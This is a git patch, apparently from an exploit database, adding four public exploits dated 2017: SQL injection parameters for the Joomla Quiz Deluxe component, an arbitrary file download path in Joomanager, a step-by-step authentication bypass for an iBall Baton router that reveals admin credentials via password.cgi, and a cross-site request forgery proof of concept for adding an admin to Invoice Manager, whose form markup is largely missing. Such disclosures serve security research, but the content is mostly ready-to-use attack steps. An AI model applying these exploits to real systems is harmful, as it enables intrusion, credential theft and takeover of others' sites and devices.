From 6b9cb90c813c4ce5ed545ea75eaf910b60838855 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 31 Aug 2017 05:01:22 +0000 Subject: [PATCH] DB: 2017-08-31 4 new exploits Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection Joomla! Component Joomanager 2.0.0 - Arbitrary File Download iBall Baton 150M Wireless Router - Authentication Bypass Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin) --- files.csv | 4 ++ platforms/php/webapps/42589.txt | 26 +++++++++++ platforms/php/webapps/42590.txt | 25 +++++++++++ platforms/php/webapps/42591.txt | 74 ++++++++++++++++++++++++++++++++ platforms/php/webapps/42592.html | 73 +++++++++++++++++++++++++++++++ 5 files changed, 202 insertions(+) create mode 100755 platforms/php/webapps/42589.txt create mode 100755 platforms/php/webapps/42590.txt create mode 100755 platforms/php/webapps/42591.txt create mode 100755 platforms/php/webapps/42592.html diff --git a/files.csv b/files.csv index 48593d927..f24719077 100644 --- a/files.csv +++ b/files.csv @@ -38373,3 +38373,7 @@ id,file,description,date,author,platform,type,port 42584,platforms/php/webapps/42584.txt,"User Login and Management - Multiple Vulnerabilities",2017-08-29,"Ali BawazeEer",php,webapps,0 42585,platforms/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0 42588,platforms/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",hardware,webapps,0 +42589,platforms/php/webapps/42589.txt,"Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection",2017-08-30,"Ihsan Sencan",php,webapps,0 +42590,platforms/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - Arbitrary File Download",2017-08-30,"Ihsan Sencan",php,webapps,0 +42591,platforms/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,php,webapps,0 +42592,platforms/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",php,webapps,0 diff --git a/platforms/php/webapps/42589.txt b/platforms/php/webapps/42589.txt new file mode 100755 index 000000000..98e7c748c --- /dev/null +++ b/platforms/php/webapps/42589.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection +# Dork: N/A +# Date: 30.08.2017 +# Vendor Homepage: http://joomplace.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/living/education-a-culture/quiz-deluxe/ +# Demo: http://demo30.joomplace.com/our-products/joomla-quiz-deluxe +# Version: 3.7.4 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?option=com_joomlaquiz&task=ajaxaction.flag_question&tmpl=component&stu_quiz_id=[SQL] +# http://localhost/[PATH]/index.php?option=com_joomlaquiz&task=ajaxaction.flag_question&tmpl=component&flag_quest=[SQL] +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42590.txt b/platforms/php/webapps/42590.txt new file mode 100755 index 000000000..e18a6d288 --- /dev/null +++ b/platforms/php/webapps/42590.txt @@ -0,0 +1,25 @@ +# # # # # +# Exploit Title: Joomla! Component Joomanager 2.0.0 - Arbitrary File Download +# Dork: N/A +# Date: 30.08.2017 +# Vendor Homepage: http://www.joomanager.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/joomanager/ +# Demo: http://www.joomanager.com/demo/realestate +# Version: 2.0.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The security obligation allows an attacker to arbitrary download files.. +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?option=com_joomanager&controller=details&task=download&path=[FILE] +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42591.txt b/platforms/php/webapps/42591.txt new file mode 100755 index 000000000..f15b94d6b --- /dev/null +++ b/platforms/php/webapps/42591.txt @@ -0,0 +1,74 @@ +Title: +==== +iball Baton 150M Wireless router - Authentication Bypass + +Credit: +====== +Name: Indrajith.A.N +Website: https://www.indrajithan.com + +Date: +==== +07-03-2017 + +Vendor: +====== +iball Envisioning the tremendous potential for innovative products required +by the ever evolving users in computing and digital world, iBall was +launched in September 2001 and which is one of the leading networking +company + +Product: +======= +iball Baton 150M Wireless-N ADSI.2+ Router + +Product link: +http://www.iball.co.in/Product/150M-Wireless-N-Broadband-Router/539 + +Abstract: +======= +iball Baton 150M Router's login page is insecurely developed that any +attacker could bypass the admin's authentication just by tweaking the +password.cgi file. + +Affected Version: +============= +Firmware Version : 1.2.6 build 110401 Rel.47776n +Hardware Version : iB-WRA150N v1 00000001 + +Exploitation-Technique: +=================== +Remote + +Severity Rating: +=================== +9 + +Details: +======= +Any attacker can escalate his privilege to admin using this vulnerability. + +Proof Of Concept: +================ +1) Navigate to Routers Login page which is usually IPV4 default Gateway IP, +i.e 172.20.174.1 + +2) Now just append password.cgi to the URL i.e +http://172.20.174.1/password.cgi + +3) Right-click and View Source code which disclsus the username, password +and user role of the admin in the comment section + +4) Successfully logged in using the disclosed credentials. + +Reference: +========= +Video POC : +https://drive.google.com/file/d/0B6715xUqH18MS1J5Sk13emFkQmc/view?usp=sharing + +Disclosure Timeline: +====================================== +Vendor Notification: March 5, 2017 + +----- +Indrajith.A.N \ No newline at end of file diff --git a/platforms/php/webapps/42592.html b/platforms/php/webapps/42592.html new file mode 100755 index 000000000..5d26222e8 --- /dev/null +++ b/platforms/php/webapps/42592.html @@ -0,0 +1,73 @@ +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # + + + +# ======================================================== +# +# +# Invoice Manager v3.1 Cross site request forgery (Add Admin) +# +# Description : Invoice Manager v3.1 is vulnerable to CSRF attack (No CSRF token in place) which if an admin user can be +# tricked to visit a crafted URL created by attacker (via spear phishing/social engineering). +# Once exploited, the attacker can login as the admin using the email and the password in the below exploit. +# +# +# ======================CSRF POC (Adding New user with Administrator Privileges)================================== + + + + +
+ + + + + + + + + + + + +# =================================================EOF ======================================================= +# +# +# Risk : attackers are able to gain full access to the administrator panel after chaning the password for the admin +# and thus have total control over the web application, including content change,and change user's account download backup of the site access to user's data.. +# +# +# Remedy : developer should implement CSRF token for each request +# +# +# +# ======================================================== +# [+] Disclaimer +# +# Permission is hereby granted for the redistribution of this advisory, +# provided that it is not altered except by reformatting it, and that due +# credit is given. Permission is explicitly given for insertion in +# vulnerability databases and similar, provided that due credit is given to +# the author. The author is not responsible for any misuse of the information contained +# herein and prohibits any malicious use of all security related information +# or exploits by the author or elsewhere. +# +# +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # + + + + +